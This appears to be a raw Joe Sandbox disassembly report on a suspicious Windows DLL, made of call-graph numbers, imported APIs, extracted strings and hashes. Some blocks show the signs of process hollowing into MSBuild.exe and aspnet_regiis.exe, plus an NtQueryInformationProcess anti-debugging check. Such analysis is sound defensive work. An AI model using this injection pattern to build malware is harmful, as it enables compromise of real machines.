6ce11516 10608->10639 10613 6ce11379 10613->10589 10615 6ce1135e 10615->10589 10617 6ce113fd 10616->10617 10618 6ce113de 10616->10618 10617->10592 10619 6ce113e8 DeleteCriticalSection 10618->10619 10619->10617 10619->10619 10625 6ce114cd 10620->10625 10623 6ce1163d InitializeCriticalSectionAndSpinCount 10624 6ce11628 10623->10624 10624->10603 10626 6ce11508 10625->10626 10627 6ce114e5 10625->10627 10626->10623 10626->10624 10627->10626 10631 6ce11433 10627->10631 10630 6ce114fa GetProcAddress 10630->10626 10632 6ce1143f ___vcrt_InitializeCriticalSectionEx 10631->10632 10633 6ce114b3 10632->10633 10634 6ce11455 LoadLibraryExW 10632->10634 10638 6ce11495 LoadLibraryExW 10632->10638 10633->10626 10633->10630 10635 6ce11473 GetLastError 10634->10635 10636 6ce114ba 10634->10636 10635->10632 10636->10633 10637 6ce114c2 FreeLibrary 10636->10637 10637->10633 10638->10632 10638->10636 10640 6ce114cd ___vcrt_InitializeCriticalSectionEx 5 API calls 10639->10640 10641 6ce11530 10640->10641 10642 6ce11549 TlsAlloc 10641->10642 10643 6ce11353 10641->10643 10643->10615 10644 6ce115c7 10643->10644 10645 6ce114cd ___vcrt_InitializeCriticalSectionEx 5 API calls 10644->10645 10646 6ce115e1 10645->10646 10647 6ce115fc TlsSetValue 10646->10647 10648 6ce1136c 10646->10648 10647->10648 10648->10613 10649 6ce1137c 10648->10649 10650 6ce11386 10649->10650 10652 6ce1138c 10649->10652 10653 6ce11551 10650->10653 10652->10615 10654 6ce114cd ___vcrt_InitializeCriticalSectionEx 5 API calls 10653->10654 10655 6ce1156b 10654->10655 10656 6ce11583 TlsFree 10655->10656 10657 6ce11577 10655->10657 10656->10657 10657->10652 10659 6ce14a6d 10658->10659 10660 6ce10162 10658->10660 10659->10660 10662 6ce1491d 10659->10662 10660->10569 10660->10596 10663 6ce14924 10662->10663 10664 6ce14967 GetStdHandle 10663->10664 10665 6ce149cd 10663->10665 10666 6ce1497a GetFileType 10663->10666 10664->10663 10665->10659 10666->10663 10668 6ce10180 10667->10668 10669 6ce10184 10667->10669 10668->10573 10670 6ce102da __DllMainCRTStartup@12 4 API calls 10669->10670 10671 6ce10191 ___scrt_release_startup_lock 10669->10671 10672 6ce101fa 10670->10672 10671->10573 10679 6ce1291b 10673->10679 10676 6ce10f8b 10745 6ce11273 10676->10745 10680 6ce12925 10679->10680 10681 6ce100cf 10679->10681 10682 6ce14691 _free 6 API calls 10680->10682 10681->10676 10683 6ce1292c 10682->10683 10683->10681 10684 6ce146d0 _free 6 API calls 10683->10684 10685 6ce1293f 10684->10685 10687 6ce127e2 10685->10687 10688 6ce127ed 10687->10688 10689 6ce127fd 10687->10689 10693 6ce12803 10688->10693 10689->10681 10692 6ce12f43 _free 14 API calls 10692->10689 10694 6ce12818 10693->10694 10698 6ce1281e 10693->10698 10696 6ce12f43 _free 14 API calls 10694->10696 10695 6ce12f43 _free 14 API calls 10697 6ce1282a 10695->10697 10696->10698 10699 6ce12f43 _free 14 API calls 10697->10699 10698->10695 10700 6ce12835 10699->10700 10701 6ce12f43 _free 14 API calls 10700->10701 10702 6ce12840 10701->10702 10703 6ce12f43 _free 14 API calls 10702->10703 10704 6ce1284b 10703->10704 10705 6ce12f43 _free 14 API calls 10704->10705 10706 6ce12856 10705->10706 10707 6ce12f43 _free 14 API calls 10706->10707 10708 6ce12861 10707->10708 10709 6ce12f43 _free 14 API calls 10708->10709 10710 6ce1286c 10709->10710 10711 6ce12f43 _free 14 API calls 10710->10711 10712 6ce12877 10711->10712 10713 6ce12f43 _free 14 API calls 10712->10713 10714 6ce12885 10713->10714 10719 6ce1262f 10714->10719 10720 6ce1263b ___scrt_is_nonwritable_in_current_image 10719->10720 10735 6ce12bda EnterCriticalSection 10720->10735 10722 6ce1266f 10736 6ce1268e 10722->10736 10725 6ce12645 10725->10722 10726 6ce12f43 _free 14 API calls 10725->10726 10726->10722 10727 6ce1269a 10728 6ce126a6 ___scrt_is_nonwritable_in_current_image 10727->10728 10740 6ce12bda EnterCriticalSection 10728->10740 10730 6ce126b0 10731 6ce128d0 _free 14 API calls 10730->10731 10732 6ce126c3 10731->10732 10741 6ce126e3 10732->10741 10735->10725 10739 6ce12c22 LeaveCriticalSection 10736->10739 10738 6ce1267c 10738->10727 10739->10738 10740->10730 10744 6ce12c22 LeaveCriticalSection 10741->10744 10743 6ce126d1 10743->10692 10744->10743 10746 6ce11280 10745->10746 10752 6ce100d4 10745->10752 10750 6ce1128e 10746->10750 10753 6ce1158c 10746->10753 10748 6ce115c7 ___vcrt_FlsSetValue 6 API calls 10749 6ce1129e 10748->10749 10758 6ce11257 10749->10758 10750->10748 10752->10505 10754 6ce114cd ___vcrt_InitializeCriticalSectionEx 5 API calls 10753->10754 10755 6ce115a6 10754->10755 10756 6ce115b2 10755->10756 10757 6ce115be TlsGetValue 10755->10757 10756->10750 10757->10756 10759 6ce11261 10758->10759 10761 6ce1126e 10758->10761 10759->10761 10762 6ce123b4 10759->10762 10761->10752 10763 6ce12f43 _free 14 API calls 10762->10763 10764 6ce123cc 10763->10764 10764->10761 10771 6ce112b7 10765->10771 10767 6ce100b0 10767->10532 10768 6ce12323 10767->10768 10769 6ce12a9e _free 14 API calls 10768->10769 10770 6ce100bc 10769->10770 10770->10530 10770->10531 10772 6ce112c0 10771->10772 10773 6ce112c3 GetLastError 10771->10773 10772->10767 10774 6ce1158c ___vcrt_FlsGetValue 6 API calls 10773->10774 10775 6ce112d8 10774->10775 10776 6ce1133d SetLastError 10775->10776 10777 6ce115c7 ___vcrt_FlsSetValue 6 API calls 10775->10777 10784 6ce112f7 10775->10784 10776->10767 10778 6ce112f1 10777->10778 10779 6ce11319 10778->10779 10780 6ce115c7 ___vcrt_FlsSetValue 6 API calls 10778->10780 10778->10784 10781 6ce115c7 ___vcrt_FlsSetValue 6 API calls 10779->10781 10782 6ce1132d 10779->10782 10780->10779 10781->10782 10783 6ce123b4 ___std_type_info_destroy_list 14 API calls 10782->10783 10783->10784 10784->10776 10786 6ce10110 ___scrt_release_startup_lock 10785->10786 10787 6ce10114 10786->10787 10791 6ce10120 __DllMainCRTStartup@12 10786->10791 10810 6ce1219e 10787->10810 10790 6ce1012d 10790->10540 10791->10790 10813 6ce11a01 10791->10813 10880 6ce10f3e InterlockedFlushSList 10794->10880 10798 6ce102b8 10797->10798 10802 6ce0fc5e 10798->10802 10884 6ce12336 10798->10884 10800 6ce102c6 10801 6ce10f96 ___scrt_uninitialize_crt 7 API calls 10800->10801 10801->10802 10803 6ce0fc9a 10802->10803 10997 6ce1012e 10803->10997 10807 6ce0e6db 10806->10807 10808 6ce0fa90 _ValidateLocalCookies 5 API calls 10807->10808 10809 6ce0f765 10808->10809 10809->10554 10809->10555 10824 6ce12069 10810->10824 10814 6ce11a0f 10813->10814 10822 6ce11a20 10813->10822 10841 6ce11aa7 GetModuleHandleW 10814->10841 10819 6ce11a5a 10819->10540 10848 6ce118c7 10822->10848 10825 6ce12075 ___scrt_is_nonwritable_in_current_image 10824->10825 10832 6ce12bda EnterCriticalSection 10825->10832 10827 6ce12083 10833 6ce120c4 10827->10833 10832->10827 10834 6ce120e3 10833->10834 10835 6ce12090 10833->10835 10834->10835 10836 6ce12f43 _free 14 API calls 10834->10836 10837 6ce120b8 10835->10837 10836->10835 10840 6ce12c22 LeaveCriticalSection 10837->10840 10839 6ce1011e 10839->10540 10840->10839 10842 6ce11a14 10841->10842 10842->10822 10843 6ce11aea GetModuleHandleExW 10842->10843 10844 6ce11b09 GetProcAddress 10843->10844 10847 6ce11b1e 10843->10847 10844->10847 10845 6ce11b32 FreeLibrary 10846 6ce11b3b 10845->10846 10846->10822 10847->10845 10847->10846 10849 6ce118d3 ___scrt_is_nonwritable_in_current_image 10848->10849 10864 6ce12bda EnterCriticalSection 10849->10864 10851 6ce118dd 10865 6ce11914 10851->10865 10853 6ce118ea 10869 6ce11908 10853->10869 10856 6ce11a65 10873 6ce12c39 GetPEB 10856->10873 10859 6ce11a94 10862 6ce11aea __DllMainCRTStartup@12 3 API calls 10859->10862 10860 6ce11a74 GetPEB 10860->10859 10861 6ce11a84 GetCurrentProcess TerminateProcess 10860->10861 10861->10859 10863 6ce11a9c ExitProcess 10862->10863 10864->10851 10866 6ce11920 ___scrt_is_nonwritable_in_current_image 10865->10866 10867 6ce11981 __DllMainCRTStartup@12 10866->10867 10868 6ce1219e __DllMainCRTStartup@12 14 API calls 10866->10868 10867->10853 10868->10867 10872 6ce12c22 LeaveCriticalSection 10869->10872 10871 6ce118f6 10871->10819 10871->10856 10872->10871 10874 6ce12c53 10873->10874 10875 6ce11a6f 10873->10875 10877 6ce145b4 10874->10877 10875->10859 10875->10860 10878 6ce14531 _free 5 API calls 10877->10878 10879 6ce145d0 10878->10879 10879->10875 10882 6ce10f4e 10880->10882 10883 6ce0ffd1 10880->10883 10881 6ce123b4 ___std_type_info_destroy_list 14 API calls 10881->10882 10882->10881 10882->10883 10883->10545 10885 6ce12341 10884->10885 10887 6ce12353 ___scrt_uninitialize_crt 10884->10887 10886 6ce1234f 10885->10886 10889 6ce15177 10885->10889 10886->10800 10887->10800 10892 6ce15025 10889->10892 10895 6ce14f79 10892->10895 10896 6ce14f85 ___scrt_is_nonwritable_in_current_image 10895->10896 10903 6ce12bda EnterCriticalSection 10896->10903 10898 6ce14ffb 10912 6ce15019 10898->10912 10899 6ce14f8f ___scrt_uninitialize_crt 10899->10898 10904 6ce14eed 10899->10904 10903->10899 10905 6ce14ef9 ___scrt_is_nonwritable_in_current_image 10904->10905 10915 6ce15294 EnterCriticalSection 10905->10915 10907 6ce14f03 ___scrt_uninitialize_crt 10908 6ce14f3c 10907->10908 10916 6ce1512f 10907->10916 10926 6ce14f6d 10908->10926 10996 6ce12c22 LeaveCriticalSection 10912->10996 10914 6ce15007 10914->10886 10915->10907 10917 6ce15145 10916->10917 10918 6ce1513c 10916->10918 10929 6ce150ca 10917->10929 10920 6ce15025 ___scrt_uninitialize_crt 66 API calls 10918->10920 10925 6ce15142 10920->10925 10923 6ce15161 10942 6ce16792 10923->10942 10925->10908 10995 6ce152a8 LeaveCriticalSection 10926->10995 10928 6ce14f5b 10928->10899 10930 6ce150e2 10929->10930 10934 6ce15107 10929->10934 10931 6ce154c0 ___scrt_uninitialize_crt 25 API calls 10930->10931 10930->10934 10932 6ce15100 10931->10932 10953 6ce16f8a 10932->10953 10934->10925 10935 6ce154c0 10934->10935 10936 6ce154e1 10935->10936 10937 6ce154cc 10935->10937 10936->10923 10938 6ce12ed3 _free 14 API calls 10937->10938 10939 6ce154d1 10938->10939 10978 6ce12e16 10939->10978 10943 6ce167b0 10942->10943 10944 6ce167a3 10942->10944 10946 6ce167f9 10943->10946 10948 6ce167d7 10943->10948 10945 6ce12ed3 _free 14 API calls 10944->10945 10950 6ce167a8 10945->10950 10947 6ce12ed3 _free 14 API calls 10946->10947 10949 6ce167fe 10947->10949 10981 6ce166f0 10948->10981 10952 6ce12e16 __fassign 25 API calls 10949->10952 10950->10925 10952->10950 10954 6ce16f96 ___scrt_is_nonwritable_in_current_image 10953->10954 10955 6ce16fb6 10954->10955 10956 6ce16f9e 10954->10956 10958 6ce17051 10955->10958 10963 6ce16fe8 10955->10963 10957 6ce12ec0 __dosmaperr 14 API calls 10956->10957 10959 6ce16fa3 10957->10959 10960 6ce12ec0 __dosmaperr 14 API calls 10958->10960 10961 6ce12ed3 _free 14 API calls 10959->10961 10962 6ce17056 10960->10962 10977 6ce16fab 10961->10977 10964 6ce12ed3 _free 14 API calls 10962->10964 10965 6ce165af ___scrt_uninitialize_crt EnterCriticalSection 10963->10965 10966 6ce1705e 10964->10966 10967 6ce16fee 10965->10967 10968 6ce12e16 __fassign 25 API calls 10966->10968 10969 6ce1700a 10967->10969 10970 6ce1701f 10967->10970 10968->10977 10972 6ce12ed3 _free 14 API calls 10969->10972 10971 6ce1707c ___scrt_uninitialize_crt 60 API calls 10970->10971 10973 6ce1701a 10971->10973 10974 6ce1700f 10972->10974 10976 6ce17049 ___scrt_uninitialize_crt LeaveCriticalSection 10973->10976 10975 6ce12ec0 __dosmaperr 14 API calls 10974->10975 10975->10973 10976->10977 10977->10934 10979 6ce12db2 __fassign 25 API calls 10978->10979 10980 6ce12e22 10979->10980 10980->10923 10982 6ce166fc ___scrt_is_nonwritable_in_current_image 10981->10982 10983 6ce165af ___scrt_uninitialize_crt EnterCriticalSection 10982->10983 10984 6ce1670b 10983->10984 10985 6ce16752 10984->10985 10986 6ce16686 ___scrt_uninitialize_crt 25 API calls 10984->10986 10987 6ce12ed3 _free 14 API calls 10985->10987 10988 6ce16737 FlushFileBuffers 10986->10988 10989 6ce16757 10987->10989 10988->10989 10990 6ce16743 10988->10990 10992 6ce16786 ___scrt_uninitialize_crt LeaveCriticalSection 10989->10992 10991 6ce12ec0 __dosmaperr 14 API calls 10990->10991 10994 6ce16748 GetLastError 10991->10994 10993 6ce1676f 10992->10993 10993->10950 10994->10985 10995->10928 10996->10914 11002 6ce12366 10997->11002 11000 6ce1137c ___vcrt_uninitialize_ptd 6 API calls 11001 6ce0fc9f 11000->11001 11001->10534 11005 6ce12b7f 11002->11005 11006 6ce10135 11005->11006 11007 6ce12b89 11005->11007 11006->11000 11009 6ce14652 11007->11009 11010 6ce14531 _free 5 API calls 11009->11010 11011 6ce1466e 11010->11011 11012 6ce14677 11011->11012 11013 6ce14689 TlsFree 11011->11013 11012->11006 11838 6ce1221e 11841 6ce1202d 11838->11841 11842 6ce1203c 11841->11842 11843 6ce11f9f 14 API calls 11842->11843 11844 6ce12056 11843->11844 11845 6ce11f9f 14 API calls 11844->11845 11846 6ce12061 11845->11846
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1891406112.000000006CE01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE00000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1891390962.000000006CE00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1891429764.000000006CE1A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1891446413.000000006CE20000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1891495909.000000006CE6D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6ce00000_ReploidReplic.jbxd
                                                                                    Similarity
                                                                                    • API ID: Virtual$Memory$Write$Thread$Create$CloseHandleWindow$AllocateRead$ConsoleContextShow$AllocProcessResume
                                                                                    • String ID: B[$0cu$4#`$<CYH$@$C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe$C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe$D$H2xg$L>x?$MZx$Tg#C$iN @$kernel32.dll$ntdll.dll$WVC$\\
                                                                                    • API String ID: 491192412-2431828029
                                                                                    • Opcode ID: 90ae9973f2cb897cfbb161c378ad801c16d3bc5f7af7605c57dfa9555c3000ce
                                                                                    • Instruction ID: 8525625b8b057a399d4dbc8321c2da8604dc78051bbb062d1591c995adc07792
                                                                                    • Opcode Fuzzy Hash: 90ae9973f2cb897cfbb161c378ad801c16d3bc5f7af7605c57dfa9555c3000ce
                                                                                    • Instruction Fuzzy Hash: 53C3F176B056118FCB18CE3CDD943D977F2AB87355F2081A9D819EBB90C6358E998F80
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1891406112.000000006CE01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE00000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1891390962.000000006CE00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1891429764.000000006CE1A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1891446413.000000006CE20000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1891495909.000000006CE6D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6ce00000_ReploidReplic.jbxd
                                                                                    Similarity
                                                                                    • API ID: Handle$FileModule$CloseCreate$ProtectVirtual$Mapping$CurrentInformationNameProcess
                                                                                    • String ID: ->]y$->]y$@$B"S$lE1{$wQgt$wQgt$zdZ"$zdZ"
                                                                                    • API String ID: 1533993013-1535988992
                                                                                    • Opcode ID: cf95ede79f149bef361c719ee30e24c3b3cb068bb8f40854d29dbaa924309875
                                                                                    • Instruction ID: 3dbb95f905129956862d6832b13637ed1fdfb7c980bba44f18ab32098732a535
                                                                                    • Opcode Fuzzy Hash: cf95ede79f149bef361c719ee30e24c3b3cb068bb8f40854d29dbaa924309875
                                                                                    • Instruction Fuzzy Hash: 9F430236B042508FCF04CE7CC9953DA77F2AB57354F209659E419EBB91CB3A898A8F41

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 1338 6ce06bd0-6ce06be9 1339 6ce06bf0-6ce06bfb 1338->1339 1340 6ce06c01-6ce06c0e 1339->1340 1341 6ce06f45-6ce06fbb NtQueryInformationProcess 1339->1341 1344 6ce06c14-6ce06c21 1340->1344 1345 6ce073ae-6ce073f7 1340->1345 1342 6ce074de 1341->1342 1342->1339 1347 6ce06c27-6ce06c34 1344->1347 1348 6ce0747e-6ce074b7 1344->1348 1345->1342 1350 6ce07472-6ce07479 1347->1350 1351 6ce06c3a-6ce06c47 1347->1351 1348->1342 1350->1342 1354 6ce07143-6ce07159 1351->1354 1355 6ce06c4d-6ce06c5a 1351->1355 1354->1342 1357 6ce06c60-6ce06c6d 1355->1357 1358 6ce074c8-6ce074cf 1355->1358 1360 6ce06c73-6ce06c80 1357->1360 1361 6ce070f5-6ce0713e 1357->1361 1358->1342 1363 6ce06c86-6ce06c93 1360->1363 1364 6ce070a7-6ce070f0 1360->1364 1361->1342 1366 6ce06c99-6ce06ca6 1363->1366 1367 6ce0722c-6ce0723b 1363->1367 1364->1342 1369 6ce07059-6ce070a2 1366->1369 1370 6ce06cac-6ce06cb9 1366->1370 1367->1342 1369->1342 1372 6ce072a1-6ce072bb call 6ce0fa90 1370->1372 1373 6ce06cbf-6ce06ccc 1370->1373 1376 6ce06fc0-6ce06fc7 1373->1376 1377 6ce06cd2-6ce06cdf 1373->1377 1376->1342 1380 6ce06ce5-6ce06cf2 1377->1380 1381 6ce06fcc-6ce06fe1 1377->1381 1383 6ce07264-6ce0726b 1380->1383 1384 6ce06cf8-6ce06d05 1380->1384 1381->1342 1383->1342 1386 6ce06d0b-6ce06d18 1384->1386 1387 6ce074bc-6ce074c3 1384->1387 1389 6ce071c9-6ce0721b 1386->1389 1390 6ce06d1e-6ce06d2b 1386->1390 1387->1342 1389->1342 1392 6ce06d31-6ce06d3e 1390->1392 1393 6ce07252-6ce0725f 1390->1393 1395 6ce06d44-6ce06d51 1392->1395 1396 6ce06e45-6ce06ecd GetModuleHandleW call 6ce04900 call 6ce106c0 1392->1396 1393->1342 1399 6ce07283-6ce0728a 1395->1399 1400 6ce06d57-6ce06d64 1395->1400 1396->1342 1399->1342 1405 6ce073a2-6ce073a9 1400->1405 1406 6ce06d6a-6ce06d77 1400->1406 1405->1342 1408 6ce06fe6-6ce07054 1406->1408 1409 6ce06d7d-6ce06d8a 1406->1409 1408->1342 1411 6ce06d90-6ce06d9d 1409->1411 1412 6ce073fc-6ce0746d 1409->1412 1414 6ce06da3-6ce06db0 1411->1414 1415 6ce0732f-6ce0739d 1411->1415 1412->1342 1417 6ce07240-6ce0724d 1414->1417 1418 6ce06db6-6ce06dc3 1414->1418 1415->1342 1417->1342 1420 6ce07220-6ce07227 1418->1420 1421 6ce06dc9-6ce06dd6 1418->1421 1420->1342 1423 6ce07270-6ce0727e 1421->1423 1424 6ce06ddc-6ce06de9 1421->1424 1423->1342 1426 6ce072bc-6ce0732a 1424->1426 1427 6ce06def-6ce06dfc 1424->1427 1426->1342 1429 6ce06e02-6ce06e0f 1427->1429 1430 6ce0715e-6ce071c4 1427->1430 1432 6ce06ed2-6ce06f40 1429->1432 1433 6ce06e15-6ce06e22 1429->1433 1430->1342 1432->1342 1435 6ce06e28-6ce06e35 1433->1435 1436 6ce0728f-6ce0729c 1433->1436 1438 6ce074d4-6ce074d7 1435->1438 1439 6ce06e3b-6ce06e40 1435->1439 1436->1342 1438->1342 1439->1342
                                                                                    APIs
                                                                                    • GetModuleHandleW.KERNEL32 ref: 6CE06E73
                                                                                    • NtQueryInformationProcess.NTDLL ref: 6CE06F75
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1891406112.000000006CE01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE00000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1891390962.000000006CE00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1891429764.000000006CE1A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1891446413.000000006CE20000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1891495909.000000006CE6D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6ce00000_ReploidReplic.jbxd
                                                                                    Similarity
                                                                                    • API ID: HandleInformationModuleProcessQuery
                                                                                    • String ID: L<z}$L<z}$NtQueryInformationProcess$Vf-5$Vf-5$ntdll.dll
                                                                                    • API String ID: 2776635927-3946787029
                                                                                    • Opcode ID: 766a41ea53b62fe5b5594bd83d7c4660665775bd564953ab996f43d003ec9648
                                                                                    • Instruction ID: 48fd7214a8dfa69ab71e9acfba96a4641aa01848e86e0610aaf5345998821716
                                                                                    • Opcode Fuzzy Hash: 766a41ea53b62fe5b5594bd83d7c4660665775bd564953ab996f43d003ec9648
                                                                                    • Instruction Fuzzy Hash: 19220F76B642058FCF04CE7CC9953DE7BF2AB46318F204219D855EBB94C73A885B8B81

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 1441 6ce0fbf8-6ce0fc0b call 6ce10460 1444 6ce0fc11-6ce0fc33 call 6ce10040 1441->1444 1445 6ce0fc0d-6ce0fc0f 1441->1445 1449 6ce0fca0-6ce0fcb9 call 6ce102da call 6ce10460 1444->1449 1450 6ce0fc35-6ce0fc78 call 6ce1010b call 6ce0ffc7 call 6ce10429 call 6ce0fc8d call 6ce102ac call 6ce0fc9a 1444->1450 1446 6ce0fc7a-6ce0fc89 1445->1446 1461 6ce0fcca-6ce0fcd1 1449->1461 1462 6ce0fcbb-6ce0fcc1 1449->1462 1450->1446 1465 6ce0fcd3-6ce0fcd6 1461->1465 1466 6ce0fcdd-6ce0fcf1 dllmain_raw 1461->1466 1462->1461 1464 6ce0fcc3-6ce0fcc5 1462->1464 1468 6ce0fda3-6ce0fdb2 1464->1468 1465->1466 1469 6ce0fcd8-6ce0fcdb 1465->1469 1470 6ce0fcf7-6ce0fd08 dllmain_crt_dispatch 1466->1470 1471 6ce0fd9a-6ce0fda1 1466->1471 1473 6ce0fd0e-6ce0fd20 call 6ce0e6b0 1469->1473 1470->1471 1470->1473 1471->1468 1480 6ce0fd22-6ce0fd24 1473->1480 1481 6ce0fd49-6ce0fd4b 1473->1481 1480->1481 1482 6ce0fd26-6ce0fd44 call 6ce0e6b0 call 6ce0fbf8 dllmain_raw 1480->1482 1483 6ce0fd52-6ce0fd63 dllmain_crt_dispatch 1481->1483 1484 6ce0fd4d-6ce0fd50 1481->1484 1482->1481 1483->1471 1486 6ce0fd65-6ce0fd97 dllmain_raw 1483->1486 1484->1471 1484->1483 1486->1471
                                                                                    APIs
                                                                                    • __RTC_Initialize.LIBCMT ref: 6CE0FC3F
                                                                                    • ___scrt_uninitialize_crt.LIBCMT ref: 6CE0FC59
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1891406112.000000006CE01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE00000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1891390962.000000006CE00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1891429764.000000006CE1A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1891446413.000000006CE20000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1891495909.000000006CE6D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6ce00000_ReploidReplic.jbxd
                                                                                    Similarity
                                                                                    • API ID: Initialize___scrt_uninitialize_crt
                                                                                    • String ID:
                                                                                    • API String ID: 2442719207-0
                                                                                    • Opcode ID: 2c710061a19c1c4460c39b4bc295fadffe476582e46f508e6b041e1806c9815b
                                                                                    • Instruction ID: c0711b5223c634336449a6f2c82a62b4b5675df8c45090556b20b1418c4db43c
                                                                                    • Opcode Fuzzy Hash: 2c710061a19c1c4460c39b4bc295fadffe476582e46f508e6b041e1806c9815b
                                                                                    • Instruction Fuzzy Hash: DC418F72F08658ABDB109FA5C841BAE3AB4EB41A9CF304519E81467B40D7388D35DBD8

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 1491 6ce0fca8-6ce0fcb9 call 6ce10460 1494 6ce0fcca-6ce0fcd1 1491->1494 1495 6ce0fcbb-6ce0fcc1 1491->1495 1497 6ce0fcd3-6ce0fcd6 1494->1497 1498 6ce0fcdd-6ce0fcf1 dllmain_raw 1494->1498 1495->1494 1496 6ce0fcc3-6ce0fcc5 1495->1496 1499 6ce0fda3-6ce0fdb2 1496->1499 1497->1498 1500 6ce0fcd8-6ce0fcdb 1497->1500 1501 6ce0fcf7-6ce0fd08 dllmain_crt_dispatch 1498->1501 1502 6ce0fd9a-6ce0fda1 1498->1502 1503 6ce0fd0e-6ce0fd20 call 6ce0e6b0 1500->1503 1501->1502 1501->1503 1502->1499 1506 6ce0fd22-6ce0fd24 1503->1506 1507 6ce0fd49-6ce0fd4b 1503->1507 1506->1507 1508 6ce0fd26-6ce0fd44 call 6ce0e6b0 call 6ce0fbf8 dllmain_raw 1506->1508 1509 6ce0fd52-6ce0fd63 dllmain_crt_dispatch 1507->1509 1510 6ce0fd4d-6ce0fd50 1507->1510 1508->1507 1509->1502 1512 6ce0fd65-6ce0fd97 dllmain_raw 1509->1512 1510->1502 1510->1509 1512->1502
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1891406112.000000006CE01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE00000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1891390962.000000006CE00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1891429764.000000006CE1A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1891446413.000000006CE20000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1891495909.000000006CE6D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6ce00000_ReploidReplic.jbxd
                                                                                    Similarity
                                                                                    • API ID: dllmain_raw$dllmain_crt_dispatch
                                                                                    • String ID:
                                                                                    • API String ID: 3136044242-0
                                                                                    • Opcode ID: 2a650309a9a532b57394d123ecd52643a3a072ad8293c6ca103bac6b7e357183
                                                                                    • Instruction ID: 529cb54f470e81125d3677063d2b004a23ec471ff707de11cea920d8791be705
                                                                                    • Opcode Fuzzy Hash: 2a650309a9a532b57394d123ecd52643a3a072ad8293c6ca103bac6b7e357183
                                                                                    • Instruction Fuzzy Hash: 47219472F05619ABCB214E55CC40BAF3A79EB41A9CB314129F81457B10D3388D35CBD4

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 1517 6ce0faf1-6ce0fb07 call 6ce10460 call 6ce1013b 1522 6ce0fb0d-6ce0fb25 call 6ce10040 1517->1522 1523 6ce0fbde 1517->1523 1527 6ce0fbf0-6ce0fbf7 call 6ce102da 1522->1527 1528 6ce0fb2b-6ce0fb3c call 6ce1009d 1522->1528 1525 6ce0fbe0-6ce0fbef 1523->1525 1533 6ce0fb8b-6ce0fb99 call 6ce0fbd4 1528->1533 1534 6ce0fb3e-6ce0fb57 call 6ce103fd call 6ce0ffbb call 6ce0ffdf call 6ce11721 1528->1534 1533->1523 1539 6ce0fb9b-6ce0fba5 call 6ce102d4 1533->1539 1551 6ce0fb5c-6ce0fb60 1534->1551 1545 6ce0fbc6-6ce0fbcf 1539->1545 1546 6ce0fba7-6ce0fbb0 call 6ce101fb 1539->1546 1545->1525 1546->1545 1552 6ce0fbb2-6ce0fbc4 1546->1552 1551->1533 1553 6ce0fb62-6ce0fb69 call 6ce10072 1551->1553 1552->1545 1553->1533 1557 6ce0fb6b-6ce0fb88 call 6ce116dc 1553->1557 1557->1533
                                                                                    APIs
                                                                                    • __RTC_Initialize.LIBCMT ref: 6CE0FB3E
                                                                                      • Part of subcall function 6CE0FFBB: InitializeSListHead.KERNEL32(6CE6C388,6CE0FB48,6CE1F0D8,00000010,6CE0FAD9,?,?,?,6CE0FD01,?,00000001,?,?,00000001,?,6CE1F120), ref: 6CE0FFC0
